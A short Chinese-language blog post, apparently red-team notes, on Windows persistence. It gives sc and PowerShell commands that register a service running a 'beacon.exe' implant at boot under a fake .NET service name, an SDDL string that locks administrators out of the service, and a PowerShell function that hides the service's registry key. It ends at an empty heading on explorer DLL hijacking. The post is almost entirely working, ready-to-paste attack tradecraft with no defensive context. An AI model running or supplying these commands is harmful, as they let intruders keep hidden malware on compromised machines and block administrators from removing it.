持久化

发表于 | 分类于

Service服务方式

创建服务

1
2
3
4
#cmd
sc create "ziqi" binpath= "cmd.exe /k C:\Users\aa\Desktop\beacon.exe" depend=Tcpip obj=Localsystem start=auto
#powershell
new-service -Name ".NET CLR Networking 3.5.0.0" -DisplayName "ziqi" -BinaryPathName "cmd.exe /k C:\Users\aa\Desktop\beacon.exe"  -StartupType AutomaticDelayedStart

通过SDDL设置该服务无法被访问和修改

1
sc sdset "ziqi" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

在注册表设置该服务属性不可见

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#save as ziqi.ps1
function Server-Sddl-Change{
[CmdletBinding()]
    param
    (
        [parameter(Mandatory=$false)][String]$Name
    )
$ROOT = "HKLM:\SYSTEM\CurrentControlSet\Services\"
$S = $ROOT+$NAME
$acl = Get-Acl $S
$acl.SetAccessRuleProtection($true, $false)
$person = [System.Security.Principal.NTAccount]"Everyone"
$access = [System.Security.AccessControl.RegistryRights]"QueryValues"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Deny"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
$person = [System.Security.Principal.NTAccount]"Everyone"
$access = [System.Security.AccessControl.RegistryRights]"SetValue,CreateSubKey,EnumerateSubKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,ChangePermissions,TakeOwnership"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Allow"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
Set-Acl $S $acl
}

1
2
Import-Module ziqi.ps1
Server-sdd1-Change -Name 'ziqi'

劫持explorer进程DLL文件